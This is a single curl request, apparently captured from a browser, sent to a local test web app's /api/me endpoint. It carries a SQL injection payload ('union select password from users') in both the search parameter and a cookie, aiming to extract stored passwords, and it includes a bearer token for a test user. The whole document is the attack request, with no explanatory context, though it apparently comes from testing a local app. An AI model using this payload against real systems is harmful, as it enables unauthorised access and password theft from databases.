curl -k 'https://localhost:2443/api/me?search=1%20union%20select%20password%20from%20users' \
  -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0' \
  -H 'Accept: */*' \
  -H 'Accept-Language: en-US,en;q=0.5' \
  -H 'Accept-Encoding: gzip, deflate, br, zstd' \
  -H 'Referer: https://localhost:2443/chat' \
  -H 'Content-Type: application/json' \
  -H 'x-access-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiaW5lc0B0ZXN0LmNvbSIsIm5hbWUiOiJpbmVzIiwiaWF0IjoxNzUzMjk3MzI5fQ.mOO4yZucqWoqH8CYlY-QIj7zywcUXhIsSGvFYNdYY_M' \
  -H 'Connection: keep-alive' \
  -H 'Cookie: search=1 union select password from users' \
  -H 'Sec-Fetch-Dest: empty' \
  -H 'Sec-Fetch-Mode: cors' \
  -H 'Sec-Fetch-Site: same-origin' \
  -H 'Priority: u=4'
